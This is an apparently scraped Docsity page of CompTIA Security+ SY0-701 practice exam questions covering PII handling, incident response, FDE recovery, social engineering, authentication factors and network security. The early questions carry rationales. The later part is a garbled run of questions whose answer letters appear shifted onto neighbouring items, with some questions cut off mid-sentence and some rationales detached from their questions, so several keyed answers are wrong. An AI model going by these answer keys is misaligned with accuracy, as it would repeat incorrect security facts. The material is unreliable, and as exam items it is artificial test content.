Download CompTIA Security+ SY0-701 Fast Track: Accelerated Study Plan, Key Facts and more Exams Computer Security in PDF only on Docsity!
CompTIA Security+ SY0-701 Fast Track:
Accelerated Study Plan, Key Facts, and Practice
Test Drills for Exam Success
Here are the multiple-choice questions with rationales and the correct answers indicated: Question 1: Users in the HR department were recently informed that they need to implement a user training and awareness program which is tailored to their department. Which of the following types of training would be the MOST appropriate for this department? A. Handing PII - Correct Answer B. Risk mitigation C. Input validation D. Hashing Rationale:
- A. Handling PII (Personally Identifiable Information): The HR department deals with a significant amount of sensitive employee data, which falls under PII. Training focused on the proper handling, storage, transmission, and disposal of PII is crucial for this department to comply with privacy regulations and prevent data breaches.
- B. Risk mitigation: While risk mitigation is a general security concept relevant to all departments, training specifically on handling PII would be more directly applicable to the daily tasks and responsibilities of HR personnel.
- C. Input validation: Input validation is a software development security practice to prevent vulnerabilities like injection attacks. It's more relevant for developers than HR professionals.
- D. Hashing: Hashing is a cryptographic technique used to ensure data integrity and for password storage. It's not a primary concern for the day-to-day tasks of HR personnel. Question 2:
Which of the following incident response plan steps would MOST likely engaging business professionals with the security team to discuss changes to existing procedures? A. Recovery B. Incident identification C. Isolation / quarantine D. Lessons learned - Correct Answer E. Reporting Rationale:
- D. Lessons learned: The lessons learned phase of incident response involves reviewing the incident, the response actions taken, and identifying areas for improvement in the incident response plan and related procedures. This phase is crucial for engaging business professionals to understand the impact of the incident on business operations and to collaborate on changes to existing procedures to prevent similar incidents or improve future responses.
- A. Recovery: The recovery phase focuses on restoring affected systems and services to normal operation. While business input is needed on prioritization, the procedural changes are usually discussed later.
- B. Incident identification: This phase involves detecting and analyzing potential security incidents. It's primarily a technical activity.
- C. Isolation / quarantine: This phase involves separating affected systems to prevent further damage. It's a technical action with immediate business impact considerations.
- E. Reporting: Reporting involves communicating details of the incident to stakeholders. While business professionals are recipients of reports, the discussion of procedural changes happens more in the "lessons learned" phase. Question 3: A company is starting to allow employees to use their own personal devices without centralized management. Employees must contact IT to have their devices configured to use corporate email; access is also available to the corporate cloud-based servers. Which of the following is the BEST policy to implement under these circumstances? A. Acceptable use policy - Correct Answer B. Security policy
customers to develop, run, and manage applications without the complexity of building and^1 maintaining the infrastructure typically associated with developing and launching an app. This often includes operating systems, programming language execution environments, databases, and web servers, all running on virtual infrastructure managed by the cloud provider.
- A. An external entity that provides a physical or virtual instance of an installed operating system: This describes Infrastructure as a Service (IaaS).
- B. A third party vendor supplying support services to maintain physical platforms and servers: This describes managed services, not a cloud computing model.
- D. An internal group providing physical server instances without installed operating systems or support: This is more akin to managing bare metal servers internally, not a cloud service model. Question 5: One of the senior managers at a company called the help desk to report a problem. The manager could no longer access data on a laptop equipped with FDE. The manager requested that the FDE be removed and the laptop restored from a backup. The help desk informed the manager that the recommended solution was to decrypt the hard drive prior to reinstallation and recovery. The senior manager did not have a copy of the private key associated with the FDE on the laptop. Which of the following tools or techniques did the help desk use to avoid losing the data on the laptop? A. Public key B. Recovery agent - Correct Answer C. Registration details D. Trust Model Rationale:
- B. Recovery agent: Many Full Disk Encryption (FDE) solutions include a recovery agent feature. This allows authorized administrators (like the help desk) to decrypt the drive if the user loses their password or key. The recovery agent typically uses a separate key managed by the organization. This is the most likely mechanism the help desk would use to decrypt the drive without the manager's personal key.
- A. Public key: Public keys are used in asymmetric cryptography for encryption, but they cannot decrypt data encrypted with the corresponding private key.
- C. Registration details: Registration details might include information about the FDE setup but wouldn't provide a way to decrypt the drive without the proper key.
- D. Trust Model: A trust model defines how entities within a system trust each other. It's not a tool or technique used for data recovery in FDE. Question 6: An employee in the accounting department recently received a phishing email that instructed them to click a link in the email to view an important message from the IRS which threatened penalties if a response was not received by the end of the business day. The employee clicked on the link and the machine was infected with malware. Which of the following principles BEST describes why this social engineering ploy was successful? A. Scarcity B. Familiarity C. Social proof D. Urgency - Correct Answer Rationale:
- D. Urgency: The phishing email created a sense of urgency by threatening penalties if a response was not received by the end of the business day. This pressure tactic often bypasses critical thinking and encourages users to act quickly without verifying the legitimacy of the request.
- A. Scarcity: The principle of scarcity suggests that things are more desirable when they are limited in quantity or availability. This wasn't the primary driver in this scenario.
- B. Familiarity: The principle of familiarity suggests that people are more likely to trust and comply with requests from those they know or perceive as familiar. While the IRS might be a familiar entity, the email wasn't necessarily designed to appear as coming from a known individual.
- C. Social proof: The principle of social proof suggests that people are more likely to take action if they see others doing the same. This tactic wasn't used in the described phishing attempt. Question 7: A security technician received notification of a remotely exploitable vulnerability affecting all multifunction printers firmware installed throughout the organization. The vulnerability allows a malicious user to review all the documents processed by the affected printers. Which of the following compensating controls can the security technician implement to mitigate the security risk of a sensitive document leak?
- B. Change Management: Implementing a formal change management process is the best risk mitigation strategy to prevent unauthorized changes that lead to outages. This process typically includes steps for requesting, reviewing, approving, testing, and documenting all changes to the IT infrastructure. It ensures that changes are properly vetted and minimizes the risk of unintended consequences like the major outage described.
- A. Asset Management: Asset management focuses on tracking and managing the organization's IT assets. While important for overall IT governance, it doesn't directly prevent unauthorized changes.
- C. Configuration Management: Configuration management involves maintaining information about the configuration of IT assets. While it helps in understanding the environment, it doesn't inherently prevent unauthorized modifications. Change management builds upon configuration management by controlling how changes are made.
- D. Incident Management: Incident management focuses on responding to and resolving IT incidents after they occur. While crucial for recovery, the CIO's request is for a preventative measure to avoid future outages caused by unauthorized changes. C - - correct ans- - An incident occurred when an outside attacker was able to gain access to network resources. During the incident response, investigation security logs indicated multiple failed login attempts for a network administrator. Which of the following controls, if in place could have BEST prevented this successful attack? A. Password history B. Password complexity C. Account lockout D. Account expiration C - - correct ans- - Joe needs to track employees who log into a confidential database and edit files. In the past, critical files have been edited, and no one admits to making the edits. Which of the following does Joe need to implement in order to enforce accountability?
A. Non-repudiation B. Fault tolerance C. Hashing D. Redundancy D - - correct ans- - A new mobile banking application is being developed and uses SSL / TLS certificates but penetration tests show that it is still vulnerable to man-in-the- middle attacks, such as DNS hijacking. Which of the following would mitigate this attack? A. Certificate revocation B. Key escrow C. Public key infrastructure D. Certificate pinning A - - correct ans- - One month after a software developer was terminated, the helpdesk started receiving calls that several employees' computers were being infected with malware. Upon further research, it was determined that these employees had downloaded a shopping toolbar. It was this toolbar that downloaded and installed the errant code. Which of the following attacks has taken place? A. Logic bomb B. Cross-site scripting C. SQL injection D. Malicious add-on D - - correct ans- - Which of the following would an attacker use to generate and capture additional traffic prior to performing an IV attack?
A. Segment the network B. Use 802.1X C. Deploy a proxy sever D. Configure ACLs E. Write an acceptable use policy A - - correct ans- - Various employees have lost valuable customer data due to hard drives failing in company provided laptops. It has been discovered that the hard drives used in one model of laptops provided by the company has been recalled by the manufactory. The help desk is only able to replace the hard drives after they fail because there is no centralized record of the model of laptop given to each specific user. Which of the following could have prevented this situation from occurring? A. Data backups B. Asset tracking C. Support ownership D. BYOD policies D - - correct ans- - Attempting to inject 50 alphanumeric key strokes including spaces into an application input field that only expects four alpha characters in considered which of the following attacks? A. XML injection B. Buffer overflow C. LDAP Injection D. SQL injection
C - - correct ans- - An organization is required to log all user internet activity. Which of the following would accomplish this requirement? A. Configure an access list on the default gateway router. Configure the default gateway router to log all web traffic to a syslog server B. Configure a firewall on the internal network. On the client IP address configuration, use the IP address of the firewall as the default gateway, configure the firewall to log all traffic to a syslog server C. Configure a proxy server on the internal network and configure the proxy server to log all web traffic to a syslog server D. Configure an access list on the core switch, configure the core switch to log all web traffic to a syslog server D - - correct ans- - An agent wants to create fast and efficient cryptographic keys to use with Diffie-Hellman without using prime numbers to generate the keys. Which of the following should be used? A. Elliptic curve cryptography B. Quantum cryptography C. Public key cryptography D. Symmetric cryptography C - - correct ans- - Joe, an application developer, is building an external facing marketing site. There is an area on the page where clients may submit their feedback to articles that are posted. Joe filters client-side JAVA input. A. SQL injections B. Watering holes C. Cross site scripting D. Pharming
C. Incident management procedures D. User rights audits and reviews D - - correct ans- - The Chief Information Security Officer (CISO) is concerned that users could bring their personal laptops to work and plug them directly into the network port under their desk. Which of the following should be configured on the network switch to prevent this from happening? A. Access control lists B. Loop protection C. Firewall rule D. Port security B - - correct ans- - Ann a network administrator has been tasked with strengthening the authentication of users logging into systems in area containing sensitive information. Users log in with usernames and passwords, following by a retinal scan. Which of the following could she implement to add an additional factor of authorization? A. Requiring PII usage B. Fingerprint scanner C. Magnetic swipe cards D. Complex passphrases B - - correct ans- - In an environment where availability is critical such as Industrial control and SCADA networks, which of the following technologies in the MOST critical layer of defense for such systems? A. Log consolidation B. Intrusion Prevention system
C. Automated patch deployment D. Antivirus software ADE - - correct ans- - A security manager installed a standalone fingerprint reader at the data center. All employees that need to access the data center have been enrolled to the reader and local reader database is always kept updates. When an employee who has been enrolled uses the fingerprint reader the door to the data center opens. Which of the following does this demonstrate? (Choose three.) A. Two-factor authentication B. Single sign-on C. Something you have D. Identification E. Authentication F. Authorization A - - correct ans- - A network technician is configuring clients for VLAN access. The network address for the sales department is 192.168.0.64 with a broadcast address of 192.168.0.71. Which of the following IP address/subnet mask combinations could be used to correctly configure a client machine in the sales department? A. 192.168.0.64/ B. 192.168.0.66/ C. 192.168.0.67/ D. 192.168.0.70/
policy? (Choose two.) A. Discretionary access control B. Federation C. Single sign-on D. TOTP E. Two-factor authentication A - - correct ans- - Which of the following types of attacks is based on coordinating small slices of a task across multiple systems? A. DDos B. Spam C. Spoofing D. Dos C - - correct ans- - A system security analyst wants to capture data flowing in and out of the enterprise. Which of the following would MOST likely help in achieving this goal? A. Taking screenshots B. Analyzing Big Data metadata C. Analyzing network traffic and logs D. Capturing system image C - - correct ans- - The security manager reports that the process of revoking certificates authority is too slow and should be automated. Which of the following should be used to automate this process?
A. CRL
B. GPG
C. OCSP
D. Key escrow A - - correct ans- - A user attempts to install a new and relatively unknown software program recommended by a colleague. The user is unable to install the program, dispute having successfully installed other programs previously. Which of the following is MOST likely the cause for the user's inability to complete the installation? A. Application black listing B. Network Intrusion Prevention System C. Group Policy D. Application White Listing B - - correct ans- - A company needs to provide web-based access to shared data sets to mobile users, while maintaining a standardized set of security controls. Which of the following technologies is the MOST appropriate storage? A. Encrypted external hard drives B. Cloud storage C. Encrypted mobile devices D. Storage Area Network B - - correct ans- - An employee's mobile device associates with the company's guest WiFi SSID, but then is unable to retrieve email. The email settings appear to be correct. Which of the following is the MOST likely cause?
BE - - correct ans- - A company requires that all users enroll in the corporate PKI structure and digitally sign all emails. Which of the following are primary reasons to sign emails with digital certificates? (Choose two.) A. To establish non-repudiation B. To ensure integrity C. To prevent SPAM D. To establish data loss prevention E. To protect confidentiality F. To establish transport encryption B - - correct ans- - The Chief Information Officer (CIO) has asked a security analyst to determine the estimated costs associated with each potential breach of their database that contains customer information. Which of the following is the risk calculation that the CIO is asking for? A. Impact B. SLE C. ARO D. ALE CE - - correct ans- - A security assurance officer is preparing a plan to measure the technical state of a customer's enterprise. The testers employed to perform the audit will be given access to the customer facility and network. The testers will not be given access to the details of custom developed software used by the customer. However, the testers with have access to the source code for several open source applications and pieces of networking equipment used at the facility, but these items will not be within the scope of the audit.
Which of the following BEST describes the appropriate method of testing or technique to use in this scenario? (Choose two.) A. Social engineering B. All source C. Black box D. Memory dumping E. Penetration D - - correct ans- - Which of the following authentication services combines authentication and authorization in a use profile and use UDP? A. LDAP B. Kerberos C. TACACS+ D. RADIUS B - - correct ans- - A security administrator is designing an access control system, with an unlimited budget, to allow authenticated users access to network resources. Given that a multifactor authentication solution is more secure, which of the following is the BEST combination of factors? A. Retina scanner, thumbprint scanner, and password B. Username and password combo, voice recognition scanner, and retina scanner C. Password, retina scanner, and proximity reader D. One-time password pad, palm-print scanner, and proximity photo badges C - - correct ans- - The access control list (ACL) for a file on a server is as follows:
